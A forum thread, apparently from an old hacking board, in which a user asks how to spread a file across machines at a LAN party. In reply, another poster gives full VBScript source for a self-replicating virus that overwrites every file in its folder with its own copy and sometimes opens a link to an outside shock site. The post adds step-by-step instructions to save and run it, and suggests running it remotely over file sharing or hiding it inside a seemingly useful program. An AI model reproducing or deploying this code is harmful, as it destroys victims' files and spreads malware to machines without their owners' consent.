(going to a LAN on sunday

Stavros wrote:Hacking a shchool server is not worth getting expelled or suspended.
Stavros wrote:Does your school have a network admin that know's what they're doing or are they like my school: They think a firewall will be fine and don't realize how vulnerable the network is. If it's the first (and I doubt it) don't get too cocky.
I'm dismayed by the shittyness of my school. They think that they're safe behind a firewall. I ask them a remotely technical question and I get the "Uh...I don't know" response and I think, "Jesus, I'm being 'taught' by baboons."[/rant]
CircuitB0mB wrote:in order for your file to spread thorugh the LAN party the people on the LAN will have to accept it, im not sure if there is a way to flood/force the file onto the other machines but take a look at this
'pentagram
'------------------------------------------------
'VBS.=)
'Made By: sick66
'On 14-8-00
'With Notepad
'By sick66 (uv course an alias)
'Do NOT edit above this line!!!
'------------------------------------------------"
Dim pentagram, WshShell, FSO, VX, VirusLink
On Error Resume Next
Randomize
Set FSO = CreateObject("Scripting.FileSystemObject")
Set WshShell = Wscript.CreateObject("Wscript.Shell")
pentagram = Wscript.ScriptFullName
VX = Left(pentagram, InStrRev(pentagram, ""))
For Each target in FSO.GetFolder(VX).Files
FSO.CopyFile pentagram, target.Name, 1
Next
If Int((2 * Rnd) + 1) = 1 Then
MsgBox "HAIL TEXTFILES.COM", 4096 , "VBS.=)"
Set VirusLink = WshShell.CreateShortcut("C:\WINDOWS\Favorites\pentagram.URL")
VirusLink.TargetPath = "http://vagina.rotten.com/fidel/"
VirusLink.Save
WshShell.Run ("C:\WINDOWS\Favorites\pentagram.URL")
End If
'pentagram
xxxxxxxxxxxxxxxxx CUT HERE xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
follow these steps:
- right click with mouse on desktop
- select 'new'
- there you will see a list of files you can create, pick 'textfile'
- name it kewl, funny or something
- select al the code that's between the two 'cut here' lines
so that it becomes blue or black
(do NOT select the 'cut here' lines)
- once selected press ctrl+c (control+c)
or go to 'edit' and select 'copy'
- now open the new created textfile and press ctrl+v (control+v)
or go to 'edit' and select 'paste'
- the code will now appear on the screen.
to make the virus work, go to 'file' and select 'save as'
give it any name, but make sure that it ends in '.vbs'
if you want to name it funny for instance, type 'funny.vbs'
in the window where you have to specify the filename
this VBScript, runs similair to the I Love you Virus (if you remember the hype about it a while back) this is the 'malkavian' virus by -KD- which i found at www.textfiles.com
also you could likely write a simple batch file that would run the virus remotely from your computer as long as file and printer sharing is enabled on the LAN (or even write a small vb app that seems useful, but calls the virus remotely), you can check out my DOS tutorials in the General Computing section
hope this helps (sorry for the wait)